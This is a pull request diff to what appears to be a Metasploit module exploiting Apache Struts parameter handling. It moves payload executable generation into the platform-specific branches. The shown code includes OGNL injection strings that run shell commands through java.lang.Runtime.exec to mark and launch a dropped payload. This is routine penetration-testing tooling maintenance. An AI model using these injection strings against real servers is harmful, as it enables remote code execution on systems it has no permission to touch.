### PR TITLE
Move EXE generation in struts_code_exec_parameters

### DIFF
--- a/modules/exploits/multi/http/struts_code_exec_parameters.rb
+++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb
@@ -117,12 +117,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     #Set up generic values.
     payload_exe = rand_text_alphanumeric(4 + rand(4))
-    pl_exe = generate_payload_exe
 
     append = false
     #Now arch specific...
     case target['Platform']
     when 'linux'
+      pl_exe = generate_payload_exe
       path = temp_path || '/tmp/'
       payload_exe = "#{path}#{payload_exe}"
       chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{payload_exe}\".split(\"_\"))"
@@ -140,6 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
       exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
       exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
     when 'win'
+      pl_exe = generate_payload_exe
       path = temp_path || './'
       payload_exe = "#{path}#{payload_exe}.exe"
       exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')"


### PR DESCRIPTION
`generate_payload_exe` isn't valid for Java payloads.

Fixes #10000.